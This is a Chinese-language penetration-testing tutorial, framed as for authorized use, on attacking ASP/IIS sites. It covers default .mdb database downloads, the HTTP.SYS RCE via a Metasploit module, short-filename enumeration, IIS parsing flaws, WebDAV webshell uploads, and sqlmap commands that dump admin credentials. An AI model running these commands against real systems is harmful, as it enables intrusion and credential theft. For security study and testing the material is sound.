本文仅用于授权渗透测试与安全研究禁止对未授权目标进行任何攻击操作违者后果自负。一、ASP 默认安装 MDB 数据库泄漏下载漏洞原理ASP 站点常搭配 Access 数据库.mdb数据库连接路径直接写在 ASP 脚本中。若管理员未修改默认路径攻击者可直接通过 URL 下载数据库文件本地打开获取账号密码、后台地址等敏感数据。利用条件目标为 ASP Access 架构数据库路径未修改、未做访问限制可直接通过 HTTP 请求下载.mdb文件典型利用流程扫描/猜解常见默认数据库路径构造 URL 直接下载http://xxx.com/data/#data.mdb、/database/db.mdb等本地用 Access 或相关工具打开读取管理员账号密码二、IIS 中间件漏洞合集HTTP.SYS、短文件、解析、写权限1. HTTP.SYS 远程代码执行CVE-2015-1635漏洞概述Windows HTTP 协议栈漏洞攻击者构造特殊 HTTP 请求可在系统权限下执行任意代码。影响版本Windows 7 / Server 2008 R2Windows 8 / Server 2012Windows 8.1 / Server 2012 R2利用条件IIS 6.0 及以上版本。MSF 复现实操msfconsole use exploit/windows/http/ms15_034_http_sys_memory_corruption show options set RHOST 目标IP run2. IIS 短文件名8.3泄露漏洞漏洞原理Windows 为兼容 16 位程序会为长文件名自动生成短文件名如admin.asp→ADMIN~1.ASP。IIS 对包含~的请求处理不当导致攻击者可枚举敏感文件/目录名。利用价值枚举后台路径枚举数据库文件路径配合文件上传、解析漏洞 Getshell扫描工具https://github.com/irsdl/IIS-ShortName-Scanner https://github.com/lijiejie/IIS_shortname_Scanner利用命令示例python IIS_shortname_Scanner.py http://xxx.com/3. IIS 文件解析漏洞IIS 6.0 解析漏洞分号解析xxx.asp;.jpg→ 当作 ASP 执行目录解析xxx.asp/xxx.jpg→ 当作 ASP 执行利用方式上传图片马构造特殊文件名/路径触发解析执行脚本。IIS 7.x / 7.5 解析漏洞路径拼接解析xxx.jpg/xxx.php服务器会将其当作 PHP 解析配合文件上传可 Getshell。4. IIS 写权限WebDAV利用利用条件IIS ≤ 6.0目录开启写入权限开启 WebDAV 并允许写入利用思路通过 PUT 上传脚本文件直接写入 ASP 大马获取 Webshell。三、Access 注入与 SQLMAP 实战利用Access 注入特点无库名概念直接操作文件型数据库无系统表注入需猜解表名、列名配合 SQLMAP 可自动化完成注入、脱库SQLMAP 实战命令1. 探测注入点python sqlmap.py -u http://xxx.com/asp.asp?id12. 爆表名python sqlmap.py -u http://xxx.com/asp.asp?id1 --tables3. 爆指定表字段python sqlmap.py -u http://xxx.com/asp.asp?id1 -T admin --columns4. 脱库账号密码python sqlmap.py -u http://xxx.com/asp.asp?id1 -T admin -C username,password --dump四、实战利用链路典型攻击链短文件名扫描 → 爆出数据库路径 / 后台路径直接下载 MDB 数据库 → 获取管理员账号密码或利用 IIS 解析漏洞 文件上传 → 直接 Getshell存在 SQL 注入点 → SQLMAP 自动化 Access 注入脱库HTTP.SYS 漏洞可直接打系统层 RCE